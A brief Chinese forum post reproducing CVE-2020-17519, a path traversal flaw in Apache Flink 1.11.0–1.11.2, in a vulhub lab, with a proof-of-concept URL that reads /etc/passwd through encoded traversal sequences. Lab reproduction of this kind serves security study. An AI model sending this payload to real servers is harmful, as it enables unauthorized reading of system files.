Apache Flink路径遍历（CVE-2020-17519）漏洞复现

Bruce-tl · Bruce-tl 发表于 2021-1-8 16:46:10

本帖最后由 Bruce-tl 于 2021-1-8 16:48 编辑

Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。Apache Flink 1.11.0-1.11.2中引入的一项更改，允许攻击者通过JobManager进程的REST接口读取本地文件系统上的任何文件，访问仅限于JobManager进程可访问的文件。

影响版本：

1.11.0
1.11.1
1.11.2

漏洞复现：

使用vulhub搭建环境（地址：https://github.com/vulhub/vulhub）访问主页

执行poc

http://your-ip:8081/jobmanager/logs/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

复制代码

Apache Flink路径遍历（CVE-2020-17519）漏洞复现

推荐学习课程

渗透测试从入门到精通

渗透测试从入门到精通

sqlmap

介绍如何使用kali linux进行渗透测试

kali基础课程

阅读排行